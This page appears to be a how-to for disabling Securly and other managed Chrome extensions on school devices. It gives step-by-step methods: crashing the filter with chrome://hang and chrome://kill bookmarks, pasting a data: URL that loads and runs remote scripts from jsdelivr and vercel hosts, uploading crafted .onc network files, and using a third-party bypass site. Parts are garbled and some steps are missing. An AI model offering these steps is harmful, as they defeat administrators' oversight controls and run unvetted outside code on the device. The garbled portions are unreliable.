You can disable your extensions here.
Go to chrome-extension://extensionid/manifest.json Replace extensionid with your extension id.
Create a bookmark for chrome://hang, chrome://kill
Spam the bookmarks on the page.
How it works: Spamming the bookmarks hang Securly, causing it to crash and malfunction.
Copy the text below and paste it into the url bar.
data:text/html, <script src='https://cdn.jsdelivr.net/gh/dragon731012/caudns/jszip.js' defer></script> <script src='https://cdn.jsdelivr.net/gh/dragon731012/caudns/filesaver.js' defer></script> <script src='https://caudns.vercel.app/main.js' defer></script> <script> function getHtml(file){ return new Promise((resolve) => { fetch(file) .then((response) => { return response.text(); }) .then((html) => { resolve(html); }); }); } async function start(){ var html=await getHtml('https://cdn.jsdelivr.net/gh/dragon731012/caudns/data.txt'); html=html.toString(); console.log(html); document.body.innerHTML=html; } start(); </script>
If the data: protocol scheme (basically the data: part of the link) is blocked, you can press the button below to download a file that does the same thing.
After downloadin rome://network on a different tab to collect network info.
3. Paste it on the website and press the download button.
4. Open the folders to reveal the kill.onc and revive.onc files.
5. Go to chrome://network and upload the kill.onc file.
This will block any extensions from running.
To enable the extensions, upload the revive.onc file.
How it works: The files obtained are from the input values of the network.
Visit a site like https://insecurly-vercel.vercel.app/. These sites have the bypass by Bypassi.
Drag the black button into a new tab.
Press the switch to turn Securly off or on.
How it works: This button opens a new archaic Securly blocked tab. The body of this tab (aka what you see) gets replaced with a switch and some text.
How it was patched: Securly removed the category and URL part of its old blocked tab, patching this exploit.